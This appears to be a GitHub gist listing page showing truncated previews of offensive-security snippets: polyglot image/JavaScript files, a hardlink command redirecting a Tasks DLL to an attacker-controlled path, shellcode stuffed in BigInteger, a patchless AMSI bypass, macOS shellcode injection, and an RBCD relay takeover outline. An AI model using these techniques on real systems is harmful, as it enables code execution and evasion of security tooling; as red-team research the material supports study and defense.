Dwight Hohnstein djhohnstein

djhohnstein / FastDoubling.cs
Created Jul 26, 2022 — forked from code-scrap/FastDoubling.cs
FastDoubling - Mod RSA 129
using System;
using System.Numerics; // BigInteger lives in System.Numerics
class GFG{
// Function to calculate the N-th Fibonacci
// number using the fast doubling method
static void FastDoubling(BigInteger n, BigInteger []res)
{
BigInteger a, b, c, d;
// .NET's BigInteger has no (string, radix) constructor; parse the decimal string instead
BigInteger MOD = BigInteger.Parse("114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541");
djhohnstein / pnginator.rb
Created Jul 26, 2022 — forked from code-scrap/pnginator.rb
pnginator: pack Javascript into a self-extracting PNG
#!/usr/bin/env ruby -w
# pnginator.rb: pack a .js file into a PNG image with an HTML payload;
# when saved with an .html extension and opened in a browser, the HTML extracts and executes
# the javascript.
# Usage: ruby pnginator.rb input.js output.png.html
# By Gasman <>
# from an original idea by Daeken:
djhohnstein / gifjs.asm
Created Jul 26, 2022 — forked from code-scrap/gifjs.asm
A Valid GIF and JS file
; a hand-made GIF containing valid JavaScript code
; abusing header to start a JavaScript comment
; inspired by Saumil Shah's Deadly Pixels presentation
; Ange Albertini, BSD Licence 2013
; yamal gifjs.asm -o img.gif
WIDTH equ 10799 ; equivalent to 2f2a, which is '/*' in ASCII, thus starting an opening comment
djhohnstein /
Created Jul 26, 2022 — forked from code-scrap/
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.


djhohnstein / output
Created Jul 26, 2022 — forked from code-scrap/output
Shellcode as Numbers - A different kind of calc
djhohnstein / patchless_amsi.h
Created Apr 18, 2022 — forked from CCob/patchless_amsi.h
In-Process Patchless AMSI Bypass
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
djhohnstein / shellBigInt.cs
Created Feb 8, 2022
Shellcode Stuffed in BigInteger
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
djhohnstein / sc.js
Created Feb 2, 2022
DynamicWrapperX - Register Code Example
//Example Reference:
// Test
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version=""/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
djhohnstein /
Created Oct 27, 2021 — forked from monoxgas/
Perl syscall/sc injection for MacOS
use DynaLoader;
use Devel::Peek;
use Fcntl;
use 5.008001; # because 5.6 doesn't have B::PV::object_2svref
use Config;
use B (); # for B::PV
sub mmap {
my ($addr, $size, $protect, $flags) = @_;
syscall(197, $addr, $size, $protect, $flags, -1, 0);
djhohnstein /
Created Sep 13, 2021 — forked from gladiatx0r/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished, in short, by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.